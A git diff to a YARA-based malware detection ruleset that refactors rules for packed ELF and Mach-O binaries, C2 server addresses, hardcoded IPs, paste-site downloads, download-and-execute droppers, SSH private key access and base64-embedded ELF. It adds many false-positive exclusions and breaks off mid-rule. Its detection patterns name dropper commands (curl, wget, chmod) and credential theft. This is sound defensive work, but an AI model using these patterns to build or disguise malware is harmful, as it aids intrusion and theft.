diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive
index 3ca22cb57..0b61fe87b 100644
--- a/pkg/action/testdata/scan_archive
+++ b/pkg/action/testdata/scan_archive
@@ -1,6 +1,6 @@
# testdata/apko_nested.tar.gz ∴ /apko_0.13.2_linux_arm64/apko: medium
c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
collect/archives/zip: medium
credential/keychain: medium
credential/password: low
@@ -25,14 +25,15 @@ discover/network/interface_list: medium
discover/network/mac_address: medium
discover/network/netstat: medium
discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/hide_artifacts/pivot_root: medium
exec/plugin: low
exec/program: medium
diff --git a/rules/anti-static/packer/elf.yara b/rules/anti-static/elf/content.yara
similarity index 58%
rename from rules/anti-static/packer/elf.yara
rename to rules/anti-static/elf/content.yara
index bdee7686e..5620752d2 100644
--- a/rules/anti-static/packer/elf.yara
+++ b/rules/anti-static/elf/content.yara
@@ -1,4 +1,4 @@
-import "math"
+import "elf"
rule obfuscated_elf: high linux {
meta:
@@ -27,21 +27,5 @@ rule obfuscated_elf: high linux {
$debuglink = ".gnu_debuglink" fullword
condition:
- uint32(0) == 1179403647 and none of them
-}
-
-rule high_entropy_header: high {
- meta:
- description = "high entropy ELF header (>7)"
- hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d"
- hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59"
- hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0"
-
- strings:
- $not_pyinst = "pyi-bootloader-ignore-signals"
- $not_go = "syscall_linux.go"
- $not_go2 = "vdso_linux.go"
-
- condition:
- uint32(0) == 1179403647 and math.entropy(1200, 4096) > 7 and none of ($not*)
+ filesize > 512 and elf.type == elf.ET_EXEC and uint32(0) == 1179403647 and none of them
}
diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara
new file mode 100644
index 000000000..e47b11a12
--- /dev/null
+++ b/rules/anti-static/elf/entropy.yara
@@ -0,0 +1,30 @@
+import "math"
+
+private rule normal_elf {
+ condition:
+ filesize < 64MB and uint32(0) == 1179403647
+}
+
+private rule small_elf {
+ condition:
+ filesize < 400KB and uint32(0) == 1179403647
+}
+
+rule normal_elf_high_entropy_7: medium {
+ meta:
+ description = "higher entropy ELF binary (>7.1)"
+
+ condition:
+ normal_elf and math.entropy(1, filesize) >= 7.1
+}
+
+rule normal_elf_high_entropy_7_4: high {
+ meta:
+ description = "high entropy ELF binary (>7.4)"
+
+ strings:
+ $not_whirlpool = "libgcrypt-grub/cipher/whirlpool.c"
+
+ condition:
+ normal_elf and math.entropy(1, filesize) >= 7.4 and none of ($not*)
+}
diff --git a/rules/anti-static/elf/header.yara b/rules/anti-static/elf/header.yara
index 252ca50b0..3cd577aee 100644
--- a/rules/anti-static/elf/header.yara
+++ b/rules/anti-static/elf/header.yara
@@ -1,4 +1,5 @@
import "elf"
+import "math"
rule single_load_rwe: critical {
meta:
@@ -38,3 +39,20 @@ rule fake_dynamic_symbols: critical {
condition:
elf.type == elf.ET_EXEC and elf.entry_point < filesize and elf.number_of_sections > 0 and elf.dynamic_section_entries > 0 and for any i in (0..elf.dynamic_section_entries): (elf.dynamic[i].type == elf.DT_SYMTAB and not (for any j in (0..elf.number_of_sections): (elf.sections[j].type == elf.SHT_DYNSYM and for any k in (0..elf.number_of_segments): ((elf.segments[k].virtual_address <= elf.dynamic[i].val) and ((elf.segments[k].virtual_address + elf.segments[k].file_size) >= elf.dynamic[i].val) and (elf.segments[k].offset + (elf.dynamic[i].val - elf.segments[k].virtual_address)) == elf.sections[j].offset))))
}
+
+rule high_entropy_header: high {
+ meta:
+ description = "high entropy ELF header (>7)"
+ hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d"
+ hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59"
+ hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0"
+
+ strings:
+ $not_pyinst = "pyi-bootloader-ignore-signals"
+ $not_go = "syscall_linux.go"
+ $not_go2 = "vdso_linux.go"
+ $not_module = ".module_license" fullword
+
+ condition:
+ uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and math.entropy(1200, 4096) > 7 and none of ($not*)
+}
diff --git a/rules/anti-static/elf/tiny.yara b/rules/anti-static/elf/tiny.yara
new file mode 100644
index 000000000..48edec212
--- /dev/null
+++ b/rules/anti-static/elf/tiny.yara
@@ -0,0 +1,12 @@
+import "elf"
+
+rule impossibly_small_elf_program: high {
+ meta:
+ description = "ELF binary is unusually small"
+
+ strings:
+ $not_hello_c = "hello.c"
+
+ condition:
+ filesize < 8192 and filesize > 900 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and none of ($not*)
+}
diff --git a/rules/anti-static/macho/entropy.yara b/rules/anti-static/macho/entropy.yara
new file mode 100644
index 000000000..6cd1ea679
--- /dev/null
+++ b/rules/anti-static/macho/entropy.yara
@@ -0,0 +1,26 @@
+import "math"
+
+private rule smaller_macho {
+ condition:
+ filesize < 64MB and (uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962)
+}
+
+rule high_entropy_7_2: medium {
+ meta:
+ description = "higher entropy binary (>7.2)"
+
+ condition:
+ smaller_macho and math.entropy(1, filesize) >= 7.2
+}
+
+rule high_entropy_7_9: high {
+ meta:
+ description = "high entropy binary (>7.9)"
+
+ strings:
+ // prevent bazel false positive
+ $bin_java = "bin/java"
+
+ condition:
+ smaller_macho and math.entropy(1, filesize) >= 7.9 and not $bin_java
+}
diff --git a/rules/anti-static/binary/tiny.yara b/rules/anti-static/macho/tiny.yara
similarity index 70%
rename from rules/anti-static/binary/tiny.yara
rename to rules/anti-static/macho/tiny.yara
index acd73140d..6f50f3f43 100644
--- a/rules/anti-static/binary/tiny.yara
+++ b/rules/anti-static/macho/tiny.yara
@@ -1,13 +1,3 @@
-import "elf"
-
-rule impossibly_small_elf_program: high {
- meta:
- description = "ELF binary is unusually small"
-
- condition:
- filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC
-}
-
rule impossibly_small_macho_program: medium {
meta:
description = "machO binary is unusually small"
diff --git a/rules/anti-static/obfuscation/bitwise.yara b/rules/anti-static/obfuscation/bitwise.yara
index 6dc723eb9..0863d03fd 100644
--- a/rules/anti-static/obfuscation/bitwise.yara
+++ b/rules/anti-static/obfuscation/bitwise.yara
@@ -22,14 +22,22 @@ rule excessive_bitwise_math: high {
hash_2023_aiohttpp_0_1_setup = "cfa4137756f7e8243e7c7edc7cb0b431a2f4c9fa401f2570f1b960dbc86ca7c6"
strings:
- $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/
- $not_Sodium = "Sodium_Core"
- $not_SHA512 = "SHA512"
- $not_SHA256 = "SHA256"
- $not_MD4 = "MD4"
- $not_algbase = "algbase" fullword
- $not_jslint = "jslint bitwise"
- $not_include = "#define "
+ $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/
+ $not_Sodium = "Sodium_Core"
+ $not_SHA512 = "SHA512"
+ $not_SHA256 = "SHA256"
+ $not_MD4 = "MD4"
+ $not_algbase = "algbase" fullword
+ $not_jslint = "jslint bitwise"
+ $not_include = "#define "
+ $not_bitwise = "bitwise" fullword
+ $not_bitmasks = "bitmasks" fullword
+ $not_ckbcomp = "ckbcomp" fullword
+ $not_bit_test = "bits_test" fullword
+ $not_testing = "*testing.T"
+ $not_effective_bits = "effective bits"
+ $not_bit_offsets = "bit offsets"
+ $not_uuid = "uuid" fullword
condition:
filesize < 192KB and #x > 64 and none of ($not*)
diff --git a/rules/anti-static/obfuscation/hex.yara b/rules/anti-static/obfuscation/hex.yara
index 830f2758c..9e7585e13 100644
--- a/rules/anti-static/obfuscation/hex.yara
+++ b/rules/anti-static/obfuscation/hex.yara
@@ -51,13 +51,14 @@ rule hex_parse_base64_high: high {
hash_1985_package_index = "8d4daa082c46bfdef3d85a6b5e29a53ae4f45197028452de38b729d76d3714d1"
strings:
- $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/
- $lang_python = /\.unhexlify\(/
- $b_base64 = "base64"
- $b_b64decode = "b64decode"
- $not_sha256 = "sha256" fullword
- $not_sha512 = "sha512" fullword
- $not_algorithms = "algorithms" fullword
+ $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/
+ $lang_python = /\.unhexlify\(/
+ $b_base64 = "base64"
+ $b_b64decode = "b64decode"
+ $not_sha256 = "sha256" fullword
+ $not_sha512 = "sha512" fullword
+ $not_algorithms = "algorithms" fullword
+ $not_python_base64 = "return binascii.unhexlify(s)"
condition:
filesize < 32KB and any of ($lang*) and any of ($b*) and none of ($not*)
diff --git a/rules/anti-static/obfuscation/python.yara b/rules/anti-static/obfuscation/python.yara
index dce5d126b..16d69cf7c 100644
--- a/rules/anti-static/obfuscation/python.yara
+++ b/rules/anti-static/obfuscation/python.yara
@@ -220,8 +220,11 @@ rule fernet_base64: high {
$o6 = "exec("
$o7 = "eval("
+ $not_utils = "from cryptography import utils"
+ $not_fernet_itself = "class Fernet"
+
condition:
- filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*)
+ filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) and none of ($not*)
}
rule python_long_hex: medium {
@@ -261,8 +264,10 @@ rule python_hex_decimal: high {
$trash = /\\x{0,1}\d{1,3}\\/
+ $not_testing_t = "*testing.T" fullword
+
condition:
- filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100
+ filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 and none of ($not*)
}
rule dumb_int_compares: high {
diff --git a/rules/anti-static/packer/cx_freeze.yara b/rules/anti-static/packer/cx_freeze.yara
index 9240d050c..5de1b23a8 100644
--- a/rules/anti-static/packer/cx_freeze.yara
+++ b/rules/anti-static/packer/cx_freeze.yara
@@ -3,8 +3,9 @@ rule cxFreeze_Python_executable: high {
hash_2023_MacStealer_weed = "6a4f8b65a568a779801b72bce215036bea298e2c08ec54906bb3ebbe5c16c712"
strings:
- $cxfreeze = "cx_Freeze"
+ $cxfreeze = "cx_Freeze"
+ $not_importlib = "tool like cx_Freeze"
condition:
- filesize < 10485760 and $cxfreeze
+ filesize < 10485760 and $cxfreeze and none of ($not*)
}
diff --git a/rules/anti-static/packer/high_entropy.yara b/rules/anti-static/packer/high_entropy.yara
deleted file mode 100644
index ec1c7673a..000000000
--- a/rules/anti-static/packer/high_entropy.yara
+++ /dev/null
@@ -1,27 +0,0 @@
-import "math"
-
-private rule smallBinary {
- condition:
- // matches ELF or machO binary
- filesize < 64MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962)
-}
-
-rule high_entropy_7_5: medium {
- meta:
- description = "higher entropy binary (>7.5)"
-
- condition:
- smallBinary and math.entropy(1, filesize) >= 7.5
-}
-
-rule high_entropy_7_9: high {
- meta:
- description = "high entropy binary (>7.9)"
-
- strings:
- // prevent bazel false positive
- $bin_java = "bin/java"
-
- condition:
- smallBinary and math.entropy(1, filesize) >= 7.9 and not $bin_java
-}
diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara
index d7f85d70d..561bc67e1 100644
--- a/rules/c2/addr/ip.yara
+++ b/rules/c2/addr/ip.yara
@@ -30,15 +30,17 @@ rule elf_hardcoded_ip: high {
strings:
// stricter version of what's above: excludes 255.* and *.0.* *.1.*, and 8.* (likely Google)
- $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword
- $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/
- $not_incr = "10.11.12.13"
- $not_169 = "169.254.169.254"
- $not_spyder = "/search/spider"
- $not_ruby = "210.251.121.214"
- $not_1_2_3_4 = "1.2.3.4"
- $not_root_servers_h = "128.63.2.53"
- $not_root_servers_i = "192.36.148.17"
+ $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword
+ $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/
+ $not_incr = "10.11.12.13"
+ $not_169 = "169.254.169.254"
+ $not_spyder = "/search/spider"
+ $not_ruby = "210.251.121.214"
+ $not_1_2_3_4 = "1.2.3.4"
+ $not_root_servers_h = "128.63.2.53"
+ $not_root_servers_i = "192.36.148.17"
+ $not_123456789 = "123.45.67.89"
+ $not_libebt_among_init = "libebt_among_init"
condition:
filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*)
@@ -73,14 +75,17 @@ rule hardcoded_ip_port: high {
strings:
$ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}:\d{2,5}/ fullword
- $not_ssdp = "239.255.255.250:1900"
+ $not_ssdp = "239.255.255.250:"
$not_2181 = "10.101.203.230:2181"
- $not_meta = "169.254.169.254:80"
- $not_vnc = "10.10.10.10:5900"
+ $not_meta = "169.254.169.254:"
+ $not_vnc = "10.10.10.10:"
$not_azure_pgsql = "20.66.25.58:5432"
$not_wireguard = "127.212.121.99:999"
$not_minio = "172.16.34.31:9000"
$not_test = "def test_" fullword
+ $not_12 = "12.12.12.12:"
+ $not_21 = "21.21.21.21:"
+ $not_255 = "255.255.255.255:"
condition:
any of ($ip*) and none of ($not*)
diff --git a/rules/c2/addr/server.yara b/rules/c2/addr/server.yara
index c45a2b497..b271b37fd 100644
--- a/rules/c2/addr/server.yara
+++ b/rules/c2/addr/server.yara
@@ -1,21 +1,19 @@
-rule server_addr: medium {
+rule server_address: medium {
meta:
- description = "may execute a shell and communicate with a server"
+ description = "references a 'server address', possible C2 client"
+ hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d"
+ hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8"
+ hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04"
strings:
- $serverAddr = "serverAddr"
- $server_addr = "server_addr"
- $exec = "exec"
- $sh = "/bin/sh" fullword
- $sh_bash = "/bin/bash" fullword
- $sh_zsh = "/bin/zsh" fullword
- $sh_script = "ShellScript"
- $sh_exec = "ExecShell"
- $sh_cmd = "cmd.exe"
- $sh_powershell = "powershell.exe"
+ $s_underscores = /\w{0,32}server_addr\w{0,32}/
+ $s_mixed = /\w{0,32}serverAddr\w{0,32}/
+ $s_url = "serverURL" fullword
+ $s_url2 = "serverUrl" fullword
+ $s_connect = /\w{0,32}ConnectServer\w{0,32}/
condition:
- filesize < 10MB and any of ($server*) and $exec and any of ($sh*)
+ any of ($s*)
}
rule server_addr_small: high {
@@ -34,6 +32,8 @@ rule server_addr_small: high {
$sh_cmd = "cmd.exe"
$sh_powershell = "powershell.exe"
+ $hash_bang = "#!"
+
condition:
- filesize < 128KB and any of ($server*) and $exec and any of ($sh*)
+ filesize < 1MB and any of ($server*) and $exec and any of ($sh*) and not $hash_bang in (0..3)
}
diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara
index bbdfdb214..49d3a22fc 100644
--- a/rules/c2/addr/url.yara
+++ b/rules/c2/addr/url.yara
@@ -25,25 +25,13 @@ rule exotic_tld: high {
$not_gov_bd = ".gov.bd"
$not_eol = "endoflife.date"
$not_whois = "bdia.btcl.com.bd"
+ $not_arduino = "arduino.cc"
condition:
filesize < 10MB and any of ($http*) and none of ($not_*)
}
-rule binary_http_url_with_question: high {
- meta:
- description = "contains hardcoded endpoint with a question mark"
-
- strings:
- $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/
- $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/
- $not_rev_head = "?rev=HEAD"
-
- condition:
- filesize < 150MB and elf_or_macho and $ref and none of ($not*)
-}
-
-rule script_with_binary_http_url_with_question: high {
+rule http_url_with_question: medium {
meta:
description = "contains hardcoded endpoint with a question mark"
@@ -59,7 +47,38 @@ rule script_with_binary_http_url_with_question: high {
$ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/
$not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/
$not_rev_head = "?rev=HEAD"
+ $not_cgi = ".cgi?"
condition:
filesize < 256KB and any of ($f*) and $ref and none of ($not*)
}
+
+rule binary_url_with_question: high {
+ meta:
+ description = "binary contains hardcoded URL with question mark"
+
+ strings:
+ $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/
+
+ condition:
+ filesize < 150MB and elf_or_macho and $ref
+}
+
+rule script_url_with_question: high {
+ meta:
+ description = "script contains hardcoded URL with question mark"
+
+ strings:
+ $f_import = "import" fullword
+ $f_require = "require" fullword
+ $f_curl = "curl" fullword
+ $f_wget = "wget" fullword
+ $f_requests = "requests.get" fullword
+ $f_requests_post = "requests.post" fullword
+ $f_urllib = "urllib.request" fullword
+ $f_urlopen = "urlopen" fullword
+ $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/
+
+ condition:
+ filesize < 256KB and any of ($f*) and $ref
+}
diff --git a/rules/c2/server_address.yara b/rules/c2/server_address.yara
deleted file mode 100644
index 2504fbc73..000000000
--- a/rules/c2/server_address.yara
+++ /dev/null
@@ -1,16 +0,0 @@
-rule server_address: medium {
- meta:
- description = "references a 'server address', possible C2 client"
- hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d"
- hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8"
- hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04"
-
- strings:
- $underscores = /\w{0,32}server_addr\w{0,32}/
- $mixed = /\w{0,32}serverAddr\w{0,32}/
- $url = "serverURL" fullword
- $url2 = "serverUrl" fullword
-
- condition:
- any of them
-}
diff --git a/rules/c2/tool_transfer/download.yara b/rules/c2/tool_transfer/download.yara
index 3686d3042..a800bb59e 100644
--- a/rules/c2/tool_transfer/download.yara
+++ b/rules/c2/tool_transfer/download.yara
@@ -7,18 +7,19 @@ rule download_sites: high {
hash_2024_2024_GitHub_Clipper_raw = "e9f89885876c1958bc6eede3373e4f3c4d76a5bc35a247fb7531b757798cb032"
strings:
- $d_privatebin = /[\w\.]+privatebin[\w\.]+/
- $d_pastecode_dot = /pastecode\.[\w\.]+/
+ $d_privatebin = /[\w\.]+privatebin[\w\.]{1,4}\//
+ $d_pastecode_dot = /pastecode\.[\w\.]{2,16}/
+ $d_paste_dot = /\/paste\.[\w\.]{2,3}\//
$d_discord = "cdn.discordapp.com"
$d_pastebinger = "paste.bingner.com"
$d_transfer_sh = "transfer.sh"
$d_rentry = "rentry.co" fullword
- $d_pastebin = /pastebin\.[\w]{2,3}/ fullword
+ $d_pastebin = /pastebin\.[\w]{2,3}[\w\/]{0,16}/ fullword
$d_penyacom = "penyacom"
$d_controlc = "controlc.com"
$d_anotepad = "anotepad.com"
$d_privnote = "privnote.com"
- $d_hushnote = "hushnote"
+ $d_hushnote = /hushnote[\.\w\/]{3,16}/
$not_mozilla = "download.mozilla.org"
$not_google = "dl.google.com"
$not_manual = "manually upload"
diff --git a/rules/c2/tool_transfer/shell.yara b/rules/c2/tool_transfer/shell.yara
index 3226a2d98..45b6c3ed1 100644
--- a/rules/c2/tool_transfer/shell.yara
+++ b/rules/c2/tool_transfer/shell.yara
@@ -156,11 +156,10 @@ rule fetch_chmod_execute: high {
rule possible_dropper: high {
meta:
- description = "downloads and execute a program"
+ description = "download and execute a program"
strings:
- $http = "http://"
- $https = "https://"
+ $http = /https{0,1}:\/\/[\.\w\/\?\=\-]{1,64}/
$tool_curl_o = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\.\- :\"\/]{0,64}/
$tool_wget_q = "wget -"
$tool_lwp = "lwp-download"
@@ -169,10 +168,10 @@ rule possible_dropper: high {
$cmd_rm = "rm" fullword
$cmd_sleep = "sleep" fullword
$cmd_echo = "echo" fullword
- $cmd_chmod = "chmod" fullword
+ $chmod = "chmod" fullword
condition:
- filesize < 1KB and any of ($http*) and any of ($tool*) and any of ($cmd*)
+ filesize < 1KB and any of ($http*) and $chmod and any of ($tool*) and any of ($cmd*)
}
rule nohup_dropper: critical {
diff --git a/rules/credential/ssh/ssh.yara b/rules/credential/ssh/ssh.yara
index fd0f0add5..35321cf07 100644
--- a/rules/credential/ssh/ssh.yara
+++ b/rules/credential/ssh/ssh.yara
@@ -8,14 +8,14 @@ rule ssh_folder: medium {
strings:
$slash = "/.ssh"
- $re = /[\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword
+ $re = /[\~\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword
$pkg = /[a-z]{2,16}\.ssh/
condition:
filesize < 20MB and $slash or ($re and not $pkg)
}
-rule id_rsa: high {
+rule id_rsa: medium {
meta:
description = "accesses SSH private keys"
@@ -25,3 +25,20 @@ rule id_rsa: high {
condition:
filesize < 10MB and ssh_folder and $id_rsa
}
+
+rule id_rsa_not_ssh: high {
+ meta:
+ description = "non-SSH client accessing SSH private keys"
+
+ strings:
+ $id_rsa = "id_rsa" fullword
+ $not_ssh_newkeys = "SSH_MSG"
+ $not_ssh_userauth = "SSH_USERAUTH"
+ $not_ssh_20 = "SSH-2.0"
+ $not_openssh = "OpenSSH"
+ $not_ssh2 = "SSH2" fullword
+ $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK"
+
+ condition:
+ filesize < 10MB and ssh_folder and $id_rsa and none of ($not*)
+}
diff --git a/rules/data/embedded/embedded-base64-elf.yara b/rules/data/embedded/embedded-base64-elf.yara
new file mode 100644
index 000000000..3c2418ec7
--- /dev/null
+++ b/rules/data/embedded/embedded-base64-elf.yara
@@ -0,0 +1,10 @@
+rule base64_elf: high {
+ meta:
+ description = "Contains base64 encoded ELF binary"
+
+ strings:
+ $header = "f0VMRgEBAQ"
+
+ condition:
+ $header
+}
diff --git a/rules/discover/system/system_network.yara b/rules/discover/multiple.yara
similarity index 84%
rename from rules/discover/system/system_network.yara
rename to rules/discover/multiple.yara
index 9e7677b65..09410e974 100644
--- a/rules/discover/system/system_network.yara
+++ b/rules/discover/multiple.yara
@@ -49,13 +49,15 @@ private rule obfuscate {
private rule exfil {
strings:
- $f_b64decode = "application/json"
- $f_post = "requests.post"
- $f_nsurl = "NSURLRequest"
- $f_curl = /curl.{0,32}-X POST/
+ $f_app_json = "application/json"
+ $f_post = "requests.post"
+ $f_nsurl = "NSURLRequest"
+ $f_curl = /curl.{0,32}-X POST/
+
+ $not_requests_utils = "requests.utils"
condition:
- filesize < 512KB and any of them
+ filesize < 512KB and any of ($f*) and none of ($not*)
}
rule sys_net_recon_exfil: high {
@@ -63,8 +65,9 @@ rule sys_net_recon_exfil: high {
description = "may exfiltrate collected system and network information"
strings:
- $not_curl = "CURLAUTH_ONLY"
+ $not_curl = "CURLAUTH_ONLY"
+ $not_cloudinit = "cloudinit" fullword
condition:
- sys_net_recon and (obfuscate or exfil) and none of ($not*)
+ sys_net_recon and obfuscate and exfil and none of ($not*)
}
diff --git a/rules/discover/network/connectivity.yara b/rules/discover/network/connectivity.yara
new file mode 100644
index 000000000..5a4feaef5
--- /dev/null
+++ b/rules/discover/network/connectivity.yara
@@ -0,0 +1,10 @@
+rule network_connectivity: low {
+ meta:
+ description = "checks Internet connectivity"
+
+ strings:
+ $ref = "http://www.msftncsi.com/ncsi.txt"
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/network/interface-get.yara b/rules/discover/network/interface.yara
similarity index 100%
rename from rules/discover/network/interface-get.yara
rename to rules/discover/network/interface.yara
diff --git a/rules/process/effective-groupid-get.yara b/rules/discover/process/egid.yara
similarity index 100%
rename from rules/process/effective-groupid-get.yara
rename to rules/discover/process/egid.yara
diff --git a/rules/process/effective-userid-get.yara b/rules/discover/process/euid.yara
similarity index 100%
rename from rules/process/effective-userid-get.yara
rename to rules/discover/process/euid.yara
diff --git a/rules/process/name-get.yara b/rules/discover/process/name.yara
similarity index 97%
rename from rules/process/name-get.yara
rename to rules/discover/process/name.yara
index 7238cff81..eb1a72e48 100644
--- a/rules/process/name-get.yara
+++ b/rules/discover/process/name.yara
@@ -1,4 +1,4 @@
-rule progname: medium {
+rule progname: low {
meta:
description = "get the current process name"
ref = "https://linux.die.net/man/3/program_invocation_short_name"
diff --git a/rules/process/parent_pid-get.yara b/rules/discover/process/parent.yara
similarity index 100%
rename from rules/process/parent_pid-get.yara
rename to rules/discover/process/parent.yara
diff --git a/rules/process/pid-get.yara b/rules/discover/process/pid.yara
similarity index 100%
rename from rules/process/pid-get.yara
rename to rules/discover/process/pid.yara
diff --git a/rules/process/priority-get.yara b/rules/discover/process/priority.yara
similarity index 100%
rename from rules/process/priority-get.yara
rename to rules/discover/process/priority.yara
diff --git a/rules/process/limit-get.yara b/rules/discover/process/resource-limits.yara
similarity index 100%
rename from rules/process/limit-get.yara
rename to rules/discover/process/resource-limits.yara
diff --git a/rules/discover/process/runtime_deps.yara b/rules/discover/process/runtime_deps.yara
new file mode 100644
index 000000000..5abe0ebdd
--- /dev/null
+++ b/rules/discover/process/runtime_deps.yara
@@ -0,0 +1,27 @@
+rule tls_get_addr: medium {
+ meta:
+ description = "looks up thread private variables, may be used for loaded library discovery"
+ ref = "https://chao-tic.github.io/blog/2018/12/25/tls"
+
+ strings:
+ $val = "__tls_get_addr" fullword
+
+ condition:
+ any of them
+}
+
+import "elf"
+import "math"
+
+rule sus_dylib_tls_get_addr: high {
+ meta:
+ description = "suspicious runtime dependency resolution"
+
+ strings:
+ $val = "__tls_get_addr" fullword
+ $not_trampoline = "__interceptor_trampoline"
+ $not_glibc_private = "GLIBC_PRIVATE"
+
+ condition:
+ filesize < 500KB and elf.type == elf.ET_DYN and $val and none of ($not*) and math.entropy(1, filesize) >= 6
+}
diff --git a/rules/process/userid-get.yara b/rules/discover/process/uid.yara
similarity index 100%
rename from rules/process/userid-get.yara
rename to rules/discover/process/uid.yara
diff --git a/rules/process/working_directory-get.yara b/rules/discover/process/working_directory.yara
similarity index 100%
rename from rules/process/working_directory-get.yara
rename to rules/discover/process/working_directory.yara
diff --git a/rules/discover/system/cpu-info.yara b/rules/discover/system/cpu.yara
similarity index 100%
rename from rules/discover/system/cpu-info.yara
rename to rules/discover/system/cpu.yara
diff --git a/rules/discover/system/dev_full.yara b/rules/discover/system/dev_full.yara
new file mode 100644
index 000000000..ee88bdd61
--- /dev/null
+++ b/rules/discover/system/dev_full.yara
@@ -0,0 +1,10 @@
+rule dev_full: low linux {
+ meta:
+ description = "tests full disk behavior"
+
+ strings:
+ $val = "/dev/full" fullword
+
+ condition:
+ $val
+}
diff --git a/rules/discover/system/dmesg.yara b/rules/discover/system/dmesg.yara
new file mode 100644
index 000000000..50f9f9057
--- /dev/null
+++ b/rules/discover/system/dmesg.yara
@@ -0,0 +1,10 @@
+rule dmesg {
+ meta:
+ description = "accesses the kernel log ring buffer"
+
+ strings:
+ $dmesg = "dmesg" fullword
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/system/hardware-info.yara b/rules/discover/system/hardware.yara
similarity index 100%
rename from rules/discover/system/hardware-info.yara
rename to rules/discover/system/hardware.yara
diff --git a/rules/discover/system/hostname-get.yara b/rules/discover/system/hostname.yara
similarity index 100%
rename from rules/discover/system/hostname-get.yara
rename to rules/discover/system/hostname.yara
diff --git a/rules/discover/system/hostinfo_collector.yara b/rules/discover/system/multiple.yara
similarity index 100%
rename from rules/discover/system/hostinfo_collector.yara
rename to rules/discover/system/multiple.yara
diff --git a/rules/discover/system/proc.yara b/rules/discover/system/proc.yara
new file mode 100644
index 000000000..b9c2e8ecf
--- /dev/null
+++ b/rules/discover/system/proc.yara
@@ -0,0 +1,20 @@
+rule proc_multiple: high {
+ meta:
+ description = "accesses an unusual assortment of /proc files"
